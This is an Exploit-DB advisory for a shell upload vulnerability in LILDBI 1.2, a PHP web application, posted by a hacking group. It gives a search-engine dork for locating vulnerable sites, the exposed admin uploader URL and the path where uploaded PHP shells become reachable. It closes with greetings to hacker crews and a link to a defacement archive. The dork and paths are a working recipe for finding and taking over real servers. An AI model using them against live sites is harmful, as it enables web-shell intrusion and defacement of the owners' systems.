LILDBI - Arbitrary File Upload

EDB-ID:

14443

CVE:

N/A


Author:

EraGoN

Type:

webapps


Platform:

PHP

Date:

2010-07-23


# Exploit Title: LILDBI Shell Upload Vulnerability
# Date: 23.07.2010
# Author: EraGoN
# Software Link: http://productos.bvsalud.org/product.php?id=lildbi-web〈=en
# Version: 1.2
# Tested on: Ubuntu ( Linux ) - WinXP sp2/sp3

[Dark Hackers Team]

Dork : allinurl:"/lildbi/

POC :
The shell upload page : http://target.com/[path]/lildbi/e/admin/uploader.php

File Desination : http://target.com/[path]/lildbi/e/admin/files/[name].php 

Tyank you :)

Zone-H : 

http://zone-h.org/archive/notifier=Dark Hackers Team

**Proud to be Muslim
**Proud to be Albanian

[ Special Thanks For : Loock3D - XindiviD. - F3n1x1 - H4ckPr0.  all albanian and kosovo hackers ^_^ ]
[ Greetz : Albanian-Legends.CoM - Exploit-DB.COM  - inj3ct0r.com ]